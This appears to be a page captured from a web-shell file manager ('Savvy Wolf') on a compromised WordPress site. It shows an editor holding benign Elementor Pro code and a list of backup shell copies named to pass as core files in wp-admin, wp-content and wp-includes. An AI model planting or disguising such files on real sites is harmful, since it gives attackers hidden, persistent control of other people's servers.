Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: notifications-manager.php
<?php namespace ElementorPro\Core\Notifications; use ElementorPro\Plugin; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } class Notifications_Manager { /** * Send a notification. * * @param \ElementorPro\Core\Notifications\Notification $notification * @param $notifiable * * @throws \Exception * * @return $this */ public function send( Notification $notification, $notifiable ) { $payloads = $notification->get_payloads( $notifiable ); Plugin::instance()->integrations->run( $payloads ); return $this; } }